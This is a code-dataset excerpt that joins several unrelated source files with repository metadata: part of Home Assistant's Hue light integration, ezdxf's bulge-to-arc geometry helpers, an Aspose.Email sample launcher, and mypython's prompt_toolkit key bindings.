async_update_items, bridge, bridge.api.lights, {}, async_add_entities, partial(create_light, HueLight, light_coordinator, bridge, False, rooms), _setup_rooms_listener, ) # We add a listener after fetching the data, so manually trigger listener bridge.reset_jobs.append( light_coordinator.async_add_listener(update_lights_with_group_support) ) update_lights_with_group_support() async def async_safe_fetch(bridge, fetch_method): """Safely fetch data.""" try: with async_timeout.timeout(4): return await bridge.async_request_call(fetch_method) except aiohue.Unauthorized as err: await bridge.handle_unauthorized_error() raise UpdateFailed("Unauthorized") from err except aiohue.AiohueException as err: raise UpdateFailed(f"Hue error: {err}") from err @callback def async_update_items( bridge, api, current, async_add_entities, create_item, new_items_callback ): """Update items.""" new_items = [] for item_id in api: if item_id in current: continue current[item_id] = create_item(api, item_id) new_items.append(current[item_id]) bridge.hass.async_create_task(remove_devices(bridge, api, current)) if new_items: # This is currently used to setup the listener to update rooms if new_items_callback: new_items_callback() async_add_entities(new_items) def hue_brightness_to_hass(value): """Convert hue brightness 1..254 to hass format 0..255.""" return min(255, round((value / 254) * 255)) def hass_to_hue_brightness(value): """Convert hass brightness 0..255 to hue 1..254 scale.""" return max(1, round((value / 255) * 254)) class HueLight(CoordinatorEntity, LightEntity): """Representation of a Hue light.""" def __init__(self, coordinator, bridge, is_group, light, supported_features, rooms): """Initialize the light.""" super().__init__(coordinator) self.light = light self.bridge = bridge self.is_group = is_group self._supported_features = supported_features self._rooms = rooms if is_group: self.is_osram = False self.is_philips = False self.is_innr = False self.is_ewelink = False self.is_livarno = False self.gamut_typ = GAMUT_TYPE_UNAVAILABLE self.gamut = None else: self.is_osram = light.manufacturername == "OSRAM" self.is_philips = light.manufacturername == "Philips" self.is_innr = light.manufacturername == "innr" self.is_ewelink = light.manufacturername == "eWeLink" self.is_livarno = light.manufacturername.startswith("_TZ3000_") self.gamut_typ = self.light.colorgamuttype self.gamut = self.light.colorgamut _LOGGER.debug("Color gamut of %s: %s", self.name, str(self.gamut)) if self.light.swupdatestate == "readytoinstall": err = ( "Please check for software updates of the %s " "bulb in the Philips Hue App." ) _LOGGER.warning(err, self.name) if self.gamut and not color.check_valid_gamut(self.gamut): err = "Color gamut of %s: %s, not valid, setting gamut to None." 
_LOGGER.debug(err, self.name, str(self.gamut)) self.gamut_typ = GAMUT_TYPE_UNAVAILABLE self.gamut = None @property def unique_id(self): """Return the unique ID of this Hue light.""" unique_id = self.light.uniqueid if not unique_id and self.is_group and self.light.room: unique_id = self.light.room["id"] return unique_id @property def device_id(self): """Return the ID of this Hue light.""" return self.unique_id @property def name(self): """Return the name of the Hue light.""" return self.light.name @property def brightness(self): """Return the brightness of this light between 0..255.""" if self.is_group: bri = self.light.action.get("bri") else: bri = self.light.state.get("bri") if bri is None: return bri return hue_brightness_to_hass(bri) @property def _color_mode(self): """Return the hue color mode.""" if self.is_group: return self.light.action.get("colormode") return self.light.state.get("colormode") @property def hs_color(self): """Return the hs color value.""" mode = self._color_mode source = self.light.action if self.is_group else self.light.state if mode in ("xy", "hs") and "xy" in source: return color.color_xy_to_hs(*source["xy"], self.gamut) return None @property def color_temp(self): """Return the CT color value.""" # Don't return color temperature unless in color temperature mode if self._color_mode != "ct": return None if self.is_group: return self.light.action.get("ct") return self.light.state.get("ct") @property def min_mireds(self): """Return the coldest color_temp that this light supports.""" if self.is_group: return super().min_mireds min_mireds = self.light.controlcapabilities.get("ct", {}).get("min") # We filter out '0' too, which can be incorrectly reported by 3rd party buls if not min_mireds: return super().min_mireds return min_mireds @property def max_mireds(self): """Return the warmest color_temp that this light supports.""" if self.is_group: return super().max_mireds if self.is_livarno: return 500 max_mireds = self.light.controlcapabilities.get("ct", {}).get("max") if not max_mireds: return super().max_mireds return max_mireds @property def is_on(self): """Return true if device is on.""" if self.is_group: return self.light.state["any_on"] return self.light.state["on"] @property def available(self): """Return if light is available.""" return self.coordinator.last_update_success and ( self.is_group or self.bridge.allow_unreachable or self.light.state["reachable"] ) @property def supported_features(self): """Flag supported features.""" return self._supported_features @property def effect(self): """Return the current effect.""" return self.light.state.get("effect", None) @property def effect_list(self): """Return the list of supported effects.""" if self.is_osram: return [EFFECT_RANDOM] return [EFFECT_COLORLOOP, EFFECT_RANDOM] @property def device_info(self) -> DeviceInfo | None: """Return the device info.""" if self.light.type in ( GROUP_TYPE_LIGHT_GROUP, GROUP_TYPE_ROOM, GROUP_TYPE_LUMINAIRE, GROUP_TYPE_LIGHT_SOURCE, ): return None suggested_area = None if self.light.id in self._rooms: suggested_area = self._rooms[self.light.id] return DeviceInfo( identifiers={(HUE_DOMAIN, self.device_id)}, manufacturer=self.light.manufacturername, # productname added in Hue Bridge API 1.24 # (published 03/05/2018) model=self.light.productname or self.light.modelid, name=self.name, # Not yet exposed as properties in aiohue suggested_area=suggested_area, sw_version=self.light.raw["swversion"], via_device=(HUE_DOMAIN, self.bridge.api.config.bridgeid), ) async def async_added_to_hass(self) 
-> None: """Handle entity being added to Home Assistant.""" self.async_on_remove( self.bridge.listen_updates( self.light.ITEM_TYPE, self.light.id, self.async_write_ha_state ) ) await super().async_added_to_hass() async def async_turn_on(self, **kwargs): """Turn the specified or all lights on.""" command = {"on": True} if ATTR_TRANSITION in kwargs: command["transitiontime"] = int(kwargs[ATTR_TRANSITION] * 10) if ATTR_HS_COLOR in kwargs: if self.is_osram: command["hue"] = int(kwargs[ATTR_HS_COLOR][0] / 360 * 65535) command["sat"] = int(kwargs[ATTR_HS_COLOR][1] / 100 * 255) else: # Philips hue bulb models respond differently to hue/sat # requests, so we convert to XY first to ensure a consistent # color. xy_color = color.color_hs_to_xy(*kwargs[ATTR_HS_COLOR], self.gamut) command["xy"] = xy_color elif ATTR_COLOR_TEMP in kwargs: temp = kwargs[ATTR_COLOR_TEMP] command["ct"] = max(self.min_mireds, min(temp, self.max_mireds)) if ATTR_BRIGHTNESS in kwargs: command["bri"] = hass_to_hue_brightness(kwargs[ATTR_BRIGHTNESS]) flash = kwargs.get(ATTR_FLASH) if flash == FLASH_LONG: command["alert"] = "lselect" del command["on"] elif flash == FLASH_SHORT: command["alert"] = "select" del command["on"] elif not self.is_innr and not self.is_ewelink and not self.is_livarno: command["alert"] = "none" if ATTR_EFFECT in kwargs: effect = kwargs[ATTR_EFFECT] if effect == EFFECT_COLORLOOP: command["effect"] = "colorloop" elif effect == EFFECT_RANDOM: command["hue"] = random.randrange(0, 65535) command["sat"] = random.randrange(150, 254) else: command["effect"] = "none" if self.is_group: await self.bridge.async_request_call( partial(self.light.set_action, **command) ) else: await self.bridge.async_request_call( partial(self.light.set_state, **command) ) await self.coordinator.async_request_refresh() async def async_turn_off(self, **kwargs): """Turn the specified or all lights off.""" command = {"on": False} if ATTR_TRANSITION in kwargs: command["transitiontime"] = int(kwargs[ATTR_TRANSITION] * 10) flash = kwargs.get(ATTR_FLASH) if flash == FLASH_LONG: command["alert"] = "lselect" del command["on"] elif flash == FLASH_SHORT: command["alert"] = "select" del command["on"] elif not self.is_innr and not self.is_livarno: command["alert"] = "none" if self.is_group: await self.bridge.async_request_call( partial(self.light.set_action, **command) ) else: await self.bridge.async_request_call( partial(self.light.set_state, **command) ) await self.coordinator.async_request_refresh() @property def extra_state_attributes(self): """Return the device state attributes.""" if not self.is_group: return {} return {ATTR_IS_HUE_GROUP: self.is_group}
[((1183, 1203), 'datetime.timedelta', 'timedelta', ([], {'seconds': '(5)'}), '(seconds=5)\n', (1192, 1203), False, 'from datetime import timedelta\n'), ((1215, 1242), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (1232, 1242), False, 'import logging\n'), ((6930, 7002), 'functools.partial', 'partial', (['create_light', 'HueLight', 'light_coordinator', 'bridge', '(False)', 'rooms'], {}), '(create_light, HueLight, light_coordinator, bridge, False, rooms)\n', (6937, 7002), False, 'from functools import partial\n'), ((14302, 14615), 'homeassistant.helpers.entity.DeviceInfo', 'DeviceInfo', ([], {'identifiers': '{(HUE_DOMAIN, self.device_id)}', 'manufacturer': 'self.light.manufacturername', 'model': '(self.light.productname or self.light.modelid)', 'name': 'self.name', 'suggested_area': 'suggested_area', 'sw_version': "self.light.raw['swversion']", 'via_device': '(HUE_DOMAIN, self.bridge.api.config.bridgeid)'}), "(identifiers={(HUE_DOMAIN, self.device_id)}, manufacturer=self.\n light.manufacturername, model=self.light.productname or self.light.\n modelid, name=self.name, suggested_area=suggested_area, sw_version=self\n .light.raw['swversion'], via_device=(HUE_DOMAIN, self.bridge.api.config\n .bridgeid))\n", (14312, 14615), False, 'from homeassistant.helpers.entity import DeviceInfo\n'), ((3717, 3776), 'functools.partial', 'partial', (['async_safe_fetch', 'bridge', 'bridge.api.lights.update'], {}), '(async_safe_fetch, bridge, bridge.api.lights.update)\n', (3724, 3776), False, 'from functools import partial\n'), ((3851, 3930), 'homeassistant.helpers.debounce.Debouncer', 'Debouncer', (['bridge.hass', '_LOGGER'], {'cooldown': 'REQUEST_REFRESH_DELAY', 'immediate': '(True)'}), '(bridge.hass, _LOGGER, cooldown=REQUEST_REFRESH_DELAY, immediate=True)\n', (3860, 3930), False, 'from homeassistant.helpers.debounce import Debouncer\n'), ((4414, 4486), 'functools.partial', 'partial', (['create_light', 'HueLight', 'light_coordinator', 'bridge', '(False)', 'rooms'], {}), '(create_light, HueLight, light_coordinator, bridge, False, rooms)\n', (4421, 4486), False, 'from functools import partial\n'), ((4866, 4925), 'functools.partial', 'partial', (['async_safe_fetch', 'bridge', 'bridge.api.groups.update'], {}), '(async_safe_fetch, bridge, bridge.api.groups.update)\n', (4873, 4925), False, 'from functools import partial\n'), ((5000, 5079), 'homeassistant.helpers.debounce.Debouncer', 'Debouncer', (['bridge.hass', '_LOGGER'], {'cooldown': 'REQUEST_REFRESH_DELAY', 'immediate': '(True)'}), '(bridge.hass, _LOGGER, cooldown=REQUEST_REFRESH_DELAY, immediate=True)\n', (5009, 5079), False, 'from homeassistant.helpers.debounce import Debouncer\n'), ((5307, 5377), 'functools.partial', 'partial', (['create_light', 'HueLight', 'group_coordinator', 'bridge', '(True)', 'None'], {}), '(create_light, HueLight, group_coordinator, bridge, True, None)\n', (5314, 5377), False, 'from functools import partial\n'), ((7376, 7400), 'async_timeout.timeout', 'async_timeout.timeout', (['(4)'], {}), '(4)\n', (7397, 7400), False, 'import async_timeout\n'), ((7569, 7597), 'homeassistant.helpers.update_coordinator.UpdateFailed', 'UpdateFailed', (['"""Unauthorized"""'], {}), "('Unauthorized')\n", (7581, 7597), False, 'from homeassistant.helpers.update_coordinator import CoordinatorEntity, DataUpdateCoordinator, UpdateFailed\n'), ((7663, 7696), 'homeassistant.helpers.update_coordinator.UpdateFailed', 'UpdateFailed', (['f"""Hue error: {err}"""'], {}), "(f'Hue error: {err}')\n", (7675, 7696), False, 'from 
homeassistant.helpers.update_coordinator import CoordinatorEntity, DataUpdateCoordinator, UpdateFailed\n'), ((11705, 11752), 'homeassistant.util.color.color_xy_to_hs', 'color.color_xy_to_hs', (["*source['xy']", 'self.gamut'], {}), "(*source['xy'], self.gamut)\n", (11725, 11752), False, 'from homeassistant.util import color\n'), ((15843, 15899), 'homeassistant.util.color.color_hs_to_xy', 'color.color_hs_to_xy', (['*kwargs[ATTR_HS_COLOR]', 'self.gamut'], {}), '(*kwargs[ATTR_HS_COLOR], self.gamut)\n', (15863, 15899), False, 'from homeassistant.util import color\n'), ((10131, 10166), 'homeassistant.util.color.check_valid_gamut', 'color.check_valid_gamut', (['self.gamut'], {}), '(self.gamut)\n', (10154, 10166), False, 'from homeassistant.util import color\n'), ((16825, 16851), 'random.randrange', 'random.randrange', (['(0)', '(65535)'], {}), '(0, 65535)\n', (16841, 16851), False, 'import random\n'), ((16885, 16911), 'random.randrange', 'random.randrange', (['(150)', '(254)'], {}), '(150, 254)\n', (16901, 16911), False, 'import random\n'), ((17066, 17107), 'functools.partial', 'partial', (['self.light.set_action'], {}), '(self.light.set_action, **command)\n', (17073, 17107), False, 'from functools import partial\n'), ((17202, 17242), 'functools.partial', 'partial', (['self.light.set_state'], {}), '(self.light.set_state, **command)\n', (17209, 17242), False, 'from functools import partial\n'), ((17992, 18033), 'functools.partial', 'partial', (['self.light.set_action'], {}), '(self.light.set_action, **command)\n', (17999, 18033), False, 'from functools import partial\n'), ((18128, 18168), 'functools.partial', 'partial', (['self.light.set_state'], {}), '(self.light.set_state, **command)\n', (18135, 18168), False, 'from functools import partial\n')]
dmtvanzanten/ezdxf
src/ezdxf/math/bulge.py
6fe9d0aa961e011c87768aa6511256de21a662dd
# Copyright (c) 2018-2021 Manfred Moitzi # License: MIT License # source: http://www.lee-mac.com/bulgeconversion.html # source: http://www.afralisp.net/archive/lisp/Bulges1.htm from typing import Any, TYPE_CHECKING, Tuple import math from ezdxf.math import Vec2 if TYPE_CHECKING: from ezdxf.eztypes import Vertex __all__ = [ "bulge_to_arc", "bulge_3_points", "bulge_center", "bulge_radius", "arc_to_bulge" ] def polar(p: Any, angle: float, distance: float) -> Vec2: """ Returns the point at a specified `angle` and `distance` from point `p`. Args: p: point as :class:`Vec2` compatible object angle: angle in radians distance: distance """ return Vec2(p) + Vec2.from_angle(angle, distance) def angle(p1: Any, p2: Any) -> float: """ Returns angle a line defined by two endpoints and x-axis in radians. Args: p1: start point as :class:`Vec2` compatible object p2: end point as :class:`Vec2` compatible object """ return (Vec2(p2) - Vec2(p1)).angle def arc_to_bulge(center: 'Vertex', start_angle: float, end_angle: float, radius: float) -> Tuple['Vec2', 'Vec2', float]: """ Returns bulge parameters from arc parameters. Args: center: circle center point as :class:`Vec2` compatible object start_angle: start angle in radians end_angle: end angle in radians radius: circle radius Returns: tuple: (start_point, end_point, bulge) """ start_point = polar(center, start_angle, radius) end_point = polar(center, end_angle, radius) pi2 = math.pi * 2 a = math.fmod((pi2 + (end_angle - start_angle)), pi2) / 4. bulge = math.sin(a) / math.cos(a) return start_point, end_point, bulge def bulge_3_points(start_point: 'Vertex', end_point: 'Vertex', point: 'Vertex') -> float: """ Returns bulge value defined by three points. Based on 3-Points to Bulge by `Lee Mac`_. Args: start_point: start point as :class:`Vec2` compatible object end_point: end point as :class:`Vec2` compatible object point: arbitrary point as :class:`Vec2` compatible object """ a = (math.pi - angle(point, start_point) + angle(point, end_point)) / 2 return math.sin(a) / math.cos(a) def bulge_to_arc(start_point: 'Vertex', end_point: 'Vertex', bulge: float) -> Tuple['Vec2', float, float, float]: """ Returns arc parameters from bulge parameters. The arcs defined by bulge values of :class:`~ezdxf.entities.LWPolyline` and 2D :class:`~ezdxf.entities.Polyline` entities start at the vertex which includes the bulge value and ends at the following vertex. Based on Bulge to Arc by `Lee Mac`_. Args: start_point: start vertex as :class:`Vec2` compatible object end_point: end vertex as :class:`Vec2` compatible object bulge: bulge value Returns: Tuple: (center, start_angle, end_angle, radius) """ r = signed_bulge_radius(start_point, end_point, bulge) a = angle(start_point, end_point) + (math.pi / 2 - math.atan(bulge) * 2) c = polar(start_point, a, r) if bulge < 0: return c, angle(c, end_point), angle(c, start_point), abs(r) else: return c, angle(c, start_point), angle(c, end_point), abs(r) def bulge_center(start_point: 'Vertex', end_point: 'Vertex', bulge: float) -> 'Vec2': """ Returns center of arc described by the given bulge parameters. Based on Bulge Center by `Lee Mac`_. Args: start_point: start point as :class:`Vec2` compatible object end_point: end point as :class:`Vec2` compatible object bulge: bulge value as float """ start_point = Vec2(start_point) a = angle(start_point, end_point) + (math.pi / 2. - math.atan(bulge) * 2.) 
return start_point + Vec2.from_angle(a, signed_bulge_radius(start_point, end_point, bulge)) def signed_bulge_radius(start_point: 'Vertex', end_point: 'Vertex', bulge: float) -> float: return Vec2(start_point).distance(Vec2(end_point)) * ( 1. + (bulge * bulge)) / 4. / bulge def bulge_radius(start_point: 'Vertex', end_point: 'Vertex', bulge: float) -> float: """ Returns radius of arc defined by the given bulge parameters. Based on Bulge Radius by `Lee Mac`_ Args: start_point: start point as :class:`Vec2` compatible object end_point: end point as :class:`Vec2` compatible object bulge: bulge value """ return abs(signed_bulge_radius(start_point, end_point, bulge))
[((3789, 3806), 'ezdxf.math.Vec2', 'Vec2', (['start_point'], {}), '(start_point)\n', (3793, 3806), False, 'from ezdxf.math import Vec2\n'), ((704, 711), 'ezdxf.math.Vec2', 'Vec2', (['p'], {}), '(p)\n', (708, 711), False, 'from ezdxf.math import Vec2\n'), ((714, 746), 'ezdxf.math.Vec2.from_angle', 'Vec2.from_angle', (['angle', 'distance'], {}), '(angle, distance)\n', (729, 746), False, 'from ezdxf.math import Vec2\n'), ((1635, 1682), 'math.fmod', 'math.fmod', (['(pi2 + (end_angle - start_angle))', 'pi2'], {}), '(pi2 + (end_angle - start_angle), pi2)\n', (1644, 1682), False, 'import math\n'), ((1702, 1713), 'math.sin', 'math.sin', (['a'], {}), '(a)\n', (1710, 1713), False, 'import math\n'), ((1716, 1727), 'math.cos', 'math.cos', (['a'], {}), '(a)\n', (1724, 1727), False, 'import math\n'), ((2285, 2296), 'math.sin', 'math.sin', (['a'], {}), '(a)\n', (2293, 2296), False, 'import math\n'), ((2299, 2310), 'math.cos', 'math.cos', (['a'], {}), '(a)\n', (2307, 2310), False, 'import math\n'), ((1012, 1020), 'ezdxf.math.Vec2', 'Vec2', (['p2'], {}), '(p2)\n', (1016, 1020), False, 'from ezdxf.math import Vec2\n'), ((1023, 1031), 'ezdxf.math.Vec2', 'Vec2', (['p1'], {}), '(p1)\n', (1027, 1031), False, 'from ezdxf.math import Vec2\n'), ((3142, 3158), 'math.atan', 'math.atan', (['bulge'], {}), '(bulge)\n', (3151, 3158), False, 'import math\n'), ((3863, 3879), 'math.atan', 'math.atan', (['bulge'], {}), '(bulge)\n', (3872, 3879), False, 'import math\n'), ((4266, 4281), 'ezdxf.math.Vec2', 'Vec2', (['end_point'], {}), '(end_point)\n', (4270, 4281), False, 'from ezdxf.math import Vec2\n'), ((4239, 4256), 'ezdxf.math.Vec2', 'Vec2', (['start_point'], {}), '(start_point)\n', (4243, 4256), False, 'from ezdxf.math import Vec2\n')]
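The bulge helpers in the ezdxf file above convert between arc parameters and LWPolyline bulge values. A minimal round-trip sketch, assuming ezdxf is installed so the helpers shown above are importable from ezdxf.math (the center, angles, and radius below are illustrative values, not taken from this dataset row):

import math
from ezdxf.math import arc_to_bulge, bulge_to_arc

# Quarter arc of radius 1.0 centered at the origin, from 0 to 90 degrees.
start_point, end_point, bulge = arc_to_bulge((0, 0), 0.0, math.pi / 2, 1.0)
# bulge == tan(included_angle / 4), so roughly 0.4142 for a 90 degree arc.
print(round(bulge, 4))

# Converting back recovers the original center and radius (within float error).
center, start_angle, end_angle, radius = bulge_to_arc(start_point, end_point, bulge)
print(center, round(radius, 6))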
aspose-email/Aspose.Email-for-Java
Plugins/Aspose.Email Java for Python/tests/ProgrammingEmail/ManageAttachments/ManageAttachments.py
cf4567e54f7979e7296c99bcae2c6477385d7735
# To change this license header, choose License Headers in Project Properties. # To change this template file, choose Tools | Templates # and open the template in the editor. #if __name__ == "__main__": # print "Hello World" from ProgrammingEmail import ManageAttachments import jpype import os.path asposeapispath = os.path.join(os.path.abspath("./../../../"), "lib/") dataDir = os.path.join(os.path.abspath("./"), "data/") print "You need to put your Aspose.Email for Java APIs .jars in this folder:\n"+asposeapispath #print dataDir jpype.startJVM(jpype.getDefaultJVMPath(), "-Djava.ext.dirs=%s" % asposeapispath) hw = ManageAttachments(dataDir) hw.main()
[]
asmeurer/mypython
mypython/keys.py
ae984926739cc2bb3abe70566762d7b4052ed0ae
from prompt_toolkit.key_binding.bindings.named_commands import (accept_line, self_insert, backward_delete_char, beginning_of_line) from prompt_toolkit.key_binding.bindings.basic import if_no_repeat from prompt_toolkit.key_binding.bindings.basic import load_basic_bindings from prompt_toolkit.key_binding.bindings.emacs import load_emacs_bindings, load_emacs_search_bindings from prompt_toolkit.key_binding.bindings.mouse import load_mouse_bindings from prompt_toolkit.key_binding.bindings.cpr import load_cpr_bindings from prompt_toolkit.key_binding.bindings.page_navigation import load_emacs_page_navigation_bindings from prompt_toolkit.key_binding import KeyBindings, merge_key_bindings from prompt_toolkit.keys import Keys, ALL_KEYS from prompt_toolkit.filters import Condition, HasSelection, is_searching from prompt_toolkit.selection import SelectionState from prompt_toolkit.clipboard import ClipboardData from prompt_toolkit.input.vt100_parser import ANSI_SEQUENCES from prompt_toolkit.application.current import get_app from prompt_toolkit.application import run_in_terminal from prompt_toolkit import __version__ as prompt_toolkit_version from .multiline import (auto_newline, tab_should_insert_whitespace, document_is_multiline_python) from .tokenize import inside_string, matching_parens from .theme import emoji, emoji_pudb from .processors import get_pyflakes_warnings import re import subprocess import sys import textwrap import platform def get_key_bindings(): # Based on prompt_toolkit.key_binding.defaults.load_key_bindings() return merge_key_bindings([ load_basic_bindings(), load_emacs_bindings(), load_emacs_search_bindings(), load_emacs_page_navigation_bindings(), load_mouse_bindings(), load_cpr_bindings(), custom_key_bindings, ]) r = custom_key_bindings = KeyBindings() def warning_positions(event): document = event.current_buffer.document warnings = get_pyflakes_warnings(document.text, frozenset(event.current_buffer.session._locals)) positions = [] for (row, col, msg, m) in warnings: # Handle SyntaxErrorMessage which is the same warning for the whole # line. if m.col != col: continue pos = document.translate_row_col_to_index(row, col) positions.append(pos) return positions @r.add_binding(Keys.Escape, 'p') def previous_warning(event): positions = warning_positions(event) buffer = event.current_buffer buffer._show_syntax_warning = True if not positions or positions[0] >= buffer.cursor_position: return p = positions[0] for pos in positions: if pos >= buffer.cursor_position: break p = pos event.current_buffer._show_syntax_warning = True event.current_buffer.cursor_position = p @r.add_binding(Keys.Escape, 'n') def next_warning(event): positions = warning_positions(event) buffer = event.current_buffer buffer._show_syntax_warning = True if not positions or positions[-1] <= buffer.cursor_position: return p = positions[-1] for pos in reversed(positions): if pos <= buffer.cursor_position: break p = pos event.current_buffer.cursor_position = p # This can be removed once # https://github.com/prompt-toolkit/python-prompt-toolkit/pull/857 is in a # released version of prompt-toolkit. 
ANSI_SEQUENCES['\x1b[1;9A'] = (Keys.Escape, Keys.Up) ANSI_SEQUENCES['\x1b[1;9B'] = (Keys.Escape, Keys.Down) @r.add_binding(Keys.Escape, Keys.Up) def previous_history_search(event): event.key_sequence[-1].accept_next = True buffer = event.current_buffer buffer.history_backward(count=event.arg, history_search=True) @r.add_binding(Keys.Escape, 'P') @r.add_binding(Keys.Escape, Keys.Down) def forward_history_search(event): event.key_sequence[-1].accept_next = True buffer = event.current_buffer buffer.history_forward(count=event.arg, history_search=True) @r.add_binding(Keys.Escape, '<') def beginning(event): """ Move to the beginning """ event.current_buffer.cursor_position = 0 @r.add_binding(Keys.Escape, '>') def end(event): """ Move to the end """ event.current_buffer.cursor_position = len(event.current_buffer.text) # Document.start_of_paragraph/end_of_paragraph don't treat multiple blank # lines correctly. # Gives the positions right before one or more blank lines BLANK_LINES = re.compile(r'\S *(\n *\n)') @r.add_binding(Keys.Escape, '}') def forward_paragraph(event): """ Move forward one paragraph of text """ text = event.current_buffer.text cursor_position = event.current_buffer.cursor_position for m in BLANK_LINES.finditer(text): if m.start(0) > cursor_position: event.current_buffer.cursor_position = m.start(1)+1 return event.current_buffer.cursor_position = len(text) @r.add_binding(Keys.Escape, '{') def backward_paragraph(event): """ Move back one paragraph of text """ text = event.current_buffer.text cursor_position = event.current_buffer.cursor_position for m in BLANK_LINES.finditer(text[::-1]): if m.start(0) > len(text) - cursor_position: event.current_buffer.cursor_position = len(text) - m.end(1) + 1 return event.current_buffer.cursor_position = 0 WORD = re.compile(r'([a-z0-9]+|[A-Z]{2,}|[a-zA-Z0-9][a-z0-9]*)') @r.add_binding(Keys.Escape, 'f') @r.add_binding(Keys.Escape, Keys.Right) def forward_word(event): text = event.current_buffer.text cursor_position = event.current_buffer.cursor_position for m in WORD.finditer(text): if m.end(0) > cursor_position: event.current_buffer.cursor_position = m.end(0) return event.current_buffer.cursor_position = len(text) @r.add_binding(Keys.Escape, 'b') @r.add_binding(Keys.Escape, Keys.Left) def backward_word(event): """ Move back one paragraph of text """ text = event.current_buffer.text cursor_position = event.current_buffer.cursor_position for m in reversed(list(WORD.finditer(text))): if m.start(0) < cursor_position: event.current_buffer.cursor_position = m.start(0) return event.current_buffer.cursor_position = 0 @r.add_binding(Keys.Escape, 'd') def kill_word(event): buffer = event.current_buffer text = buffer.text cursor_position = buffer.cursor_position pos = None for m in WORD.finditer(text): if m.end(0) > cursor_position: pos = m.end(0) - cursor_position break if pos: deleted = buffer.delete(count=pos) event.app.clipboard.set_text(deleted) @r.add_binding(Keys.Escape, Keys.Backspace) def backward_kill_word(event): buffer = event.current_buffer text = buffer.text cursor_position = buffer.cursor_position for m in reversed(list(WORD.finditer(text))): if m.start(0) < cursor_position: pos = cursor_position - m.start(0) break else: pos = buffer.cursor_position if pos: deleted = buffer.delete_before_cursor(count=pos) event.app.clipboard.set_text(deleted) def insert_text_ovewrite(buffer, data, move_cursor=True): """ Insert characters at cursor position. :param fire_event: Fire `on_text_insert` event. 
This is mainly used to trigger autocompletion while typing. """ # Original text & cursor position. otext = buffer.text ocpos = buffer.cursor_position # Don't overwrite the newline itself. Just before the line ending, # it should act like insert mode. overwritten_text = otext[ocpos:ocpos + len(data)] buffer.text = otext[:ocpos] + data + otext[ocpos + len(overwritten_text):] if move_cursor: buffer.cursor_position += len(data) @r.add_binding(Keys.Escape, 'l') def downcase_word(event): buffer = event.current_buffer text = buffer.text cursor_position = event.current_buffer.cursor_position for m in WORD.finditer(text): pos = m.end(0) if pos > cursor_position: word = buffer.document.text[cursor_position:pos] insert_text_ovewrite(buffer, word.lower()) return event.current_buffer.cursor_position = len(text) @r.add_binding(Keys.Escape, 'u') def upcase_word(event): buffer = event.current_buffer text = buffer.text cursor_position = event.current_buffer.cursor_position for m in WORD.finditer(text): pos = m.end(0) if pos > cursor_position: word = buffer.document.text[cursor_position:pos] insert_text_ovewrite(buffer, word.upper()) return event.current_buffer.cursor_position = len(text) @r.add_binding(Keys.Escape, 'c') def capitalize_word(event): buffer = event.current_buffer text = buffer.text cursor_position = event.current_buffer.cursor_position for m in WORD.finditer(text): pos = m.end(0) if pos > cursor_position: word = buffer.document.text[cursor_position:pos] # Don't use word.capitalize() because the first character could be # - or _ for i, c in enumerate(word): if c.isalnum(): word = word[:i] + c.capitalize() + word[i+1:].lower() break insert_text_ovewrite(buffer, word) return event.current_buffer.cursor_position = len(text) @r.add_binding(Keys.Escape, Keys.ControlF) def forward_sexp(event): buffer = event.current_buffer document = buffer.document text = buffer.text row, col = document.translate_index_to_position(buffer.cursor_position) row += 1 matching, mismatching = matching_parens(text) for opening, closing in matching: if opening.start == (row, col): new_pos = document.translate_row_col_to_index(closing.end[0]-1, closing.end[1]) buffer.cursor_position = new_pos return event.app.output.bell() @r.add_binding(Keys.Escape, Keys.ControlB) def backward_sexp(event): buffer = event.current_buffer document = buffer.document text = buffer.text row, col = document.translate_index_to_position(buffer.cursor_position) row += 1 matching, mismatching = matching_parens(text) for opening, closing in matching: if closing.end == (row, col): new_pos = document.translate_row_col_to_index(opening.start[0]-1, opening.start[1]) buffer.cursor_position = new_pos return event.app.output.bell() @r.add_binding(Keys.Left) def left_multiline(event): """ Left that wraps around in multiline. """ if event.current_buffer.cursor_position - event.arg >= 0: event.current_buffer.cursor_position -= event.arg if getattr(event.current_buffer.selection_state, "shift_arrow", False): event.current_buffer.selection_state = None @r.add_binding(Keys.Right) def right_multiline(event): """ Right that wraps around in multiline. 
""" if event.current_buffer.cursor_position + event.arg <= len(event.current_buffer.text): event.current_buffer.cursor_position += event.arg if getattr(event.current_buffer.selection_state, "shift_arrow", False): event.current_buffer.selection_state = None @r.add_binding(Keys.ControlD) def exit(event): event.app.exit(exception=EOFError, style='class:exiting') @r.add_binding(Keys.ControlC, filter=~is_searching) def keyboard_interrupt(event): event.app.exit(exception=KeyboardInterrupt, style='class:aborting') is_returnable = Condition( lambda: get_app().current_buffer.is_returnable) @r.add_binding(Keys.Enter, filter=is_returnable) def multiline_enter(event): """ When not in multiline, execute. When in multiline, try to intelligently add a newline or execute. """ buffer = event.current_buffer document = buffer.document multiline = document_is_multiline_python(document) text_after_cursor = document.text_after_cursor text_before_cursor = document.text_before_cursor text = buffer.text # isspace doesn't respect vacuous truth if (not text_after_cursor or text_after_cursor.isspace()) and text_before_cursor.replace(' ', '').endswith('\n'): # If we are at the end of the buffer, accept unless we are in a # docstring row, col = document.translate_index_to_position(buffer.cursor_position) row += 1 if multiline and inside_string(text, row, col): # We are inside a docstring auto_newline(event.current_buffer) else: accept_line(event) elif not multiline: # Always accept a single valid line. Also occurs for unclosed single # quoted strings (which will give a syntax error) accept_line(event) else: auto_newline(event.current_buffer) # Always accept the line if the previous key was Up # Requires https://github.com/jonathanslenders/python-prompt-toolkit/pull/492. # We don't need a parallel for down because down is already at the end of the # prompt. @r.add_binding(Keys.Enter, filter=is_returnable) def accept_after_history_backward(event): pks = event.previous_key_sequence if pks and getattr(pks[-1], 'accept_next', False) and ((len(pks) == 1 and pks[0].key == "up") or (len(pks) == 2 and pks[0].key == "escape" and isinstance(pks[1].key, str) and pks[1].key in ['p', 'P', 'up', 'down'])): accept_line(event) else: multiline_enter(event) @r.add_binding(Keys.Escape, Keys.Enter) @r.add_binding(Keys.Escape, Keys.ControlJ) def insert_newline(event): auto_newline(event.current_buffer) @r.add_binding(Keys.ControlO) def open_line(event): event.current_buffer.newline(copy_margin=False) event.current_buffer.cursor_left() # M-[ a g is set to S-Enter in iTerm2 settings Keys.ShiftEnter = "<Shift-Enter>" ALL_KEYS.append('<Shift-Enter>') ANSI_SEQUENCES['\x1b[ag'] = Keys.ShiftEnter ANSI_SEQUENCES['\x1bOM'] = Keys.ShiftEnter if prompt_toolkit_version[0] != '3': r.add_binding(Keys.ShiftEnter)(accept_line) 